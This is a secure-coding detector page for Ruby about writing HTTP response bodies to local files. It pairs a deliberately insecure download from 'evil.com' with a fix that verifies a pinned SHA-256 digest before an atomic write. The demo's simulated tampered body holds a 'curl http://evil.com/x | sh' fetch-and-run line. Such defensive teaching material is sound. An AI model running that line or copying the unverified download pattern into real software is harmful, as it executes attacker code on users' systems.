Http to File Access
Severity
High

Writing the body of an HTTP response directly to a local file can hide unintended functionality. The content is chosen by the remote server, and over plain HTTP it can also be altered in transit, so the saved file may carry malicious code (for example a script or binary that the application later loads or runs), and the download itself becomes a new vector for attack.

Detector ID
ruby/http-to-file-access@v1.0
Category
Common Weakness Enumeration (CWE)
Tags
-

Noncompliant example

require 'net/http'

def http_file_access_noncompliant
  # Body of an unauthenticated, unencrypted HTTP response from a remote host.
  resp = Net::HTTP.new("evil.com").get("/script").body
  file = File.open("/tmp/script", "w")
  # Noncompliant: Writing a file from http access.
  file.write(resp)
  file.close
end

Compliant example

def http_file_access_compliant
  a = "a"
  file = File.open("/tmp/script", "w")
  # Compliant: Not using any http access to write in file.
  file.write(a)
  file.close
end
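The compliant example above avoids the problem by not downloading at all. When the download is genuinely needed, the practical fix is to fetch over TLS with certificate verification, check the body against a SHA-256 digest pinned in code or configuration, and only then write it, with restrictive permissions and via an atomic rename. The Ruby below is an added example written for this page, not code from the CodeGuru detector or its documentation. The `fetch_over_tls` helper and the URL it would take are illustrative and are not exercised offline; the sample script body, the pinned digest and the temporary directory used in `demo` are constructed here.

```ruby
require 'net/http'
require 'openssl'
require 'uri'
require 'digest'
require 'tempfile'
require 'tmpdir'

# Raised when a download cannot be trusted (bad status or digest mismatch).
class UntrustedDownload < StandardError; end

# Fetch a response body over HTTPS with certificate verification enabled.
# Plain http:// is refused: anyone on the network path could replace the body.
# Illustrative only; it needs a live host and is not called by demo below.
def fetch_over_tls(url)
  uri = URI.parse(url)
  raise ArgumentError, "refusing non-HTTPS URL: #{url}" unless uri.scheme == "https"
  Net::HTTP.start(uri.host, uri.port, use_ssl: true,
                  verify_mode: OpenSSL::SSL::VERIFY_PEER) do |http|
    resp = http.get(uri.request_uri)
    unless resp.is_a?(Net::HTTPSuccess)
      raise UntrustedDownload, "HTTP #{resp.code} from #{uri.host}"
    end
    resp.body
  end
end

# True when +body+ hashes to the digest pinned by the caller. The digest is
# public, so a plain string comparison is adequate here.
def digest_matches?(body, expected_sha256)
  Digest::SHA256.hexdigest(body) == expected_sha256.downcase
end

# Write +body+ to +path+ only after the digest check passes. The content goes
# to a 0600 temp file in the same directory and is renamed into place, so a
# failed or partial write never leaves a half-written file at +path+.
def write_verified(body, expected_sha256, path)
  unless digest_matches?(body, expected_sha256)
    raise UntrustedDownload, "digest mismatch for #{path}"
  end
  tmp = Tempfile.create("download", File.dirname(path))
  begin
    tmp.chmod(0600)
    tmp.binmode
    tmp.write(body)
    tmp.flush
    tmp.fsync
    tmp.close
    File.rename(tmp.path, path)
  ensure
    tmp.close unless tmp.closed?
    File.unlink(tmp.path) if File.exist?(tmp.path)
  end
  path
end

# Offline demonstration with a constructed body and a throwaway directory.
# Returns [original_still_intact, tampered_body_rejected].
def demo
  body = "#!/bin/sh\necho 'constructed sample script'\n"   # constructed input
  pinned = Digest::SHA256.hexdigest(body)  # in real code a literal from config
  Dir.mktmpdir do |dir|
    target = File.join(dir, "script")
    write_verified(body, pinned, target)
    # A body altered in transit, as a plain-HTTP interceptor could produce.
    tampered = body + "curl http://evil.com/x | sh\n"
    rejected = begin
      write_verified(tampered, pinned, target)
      false
    rescue UntrustedDownload
      true
    end
    [File.read(target) == body, rejected]
  end
end

if __FILE__ == $PROGRAM_NAME
  intact, rejected = demo
  puts "original kept intact: #{intact}, tampered body rejected: #{rejected}"
end
```

In production the pinned digest comes from the same trusted channel as the code (a literal in the repository or a signed configuration), never from the server that serves the file; otherwise the check verifies nothing. Writing into the target directory rather than a shared `/tmp` path also avoids a pre-planted symlink or file at the destination.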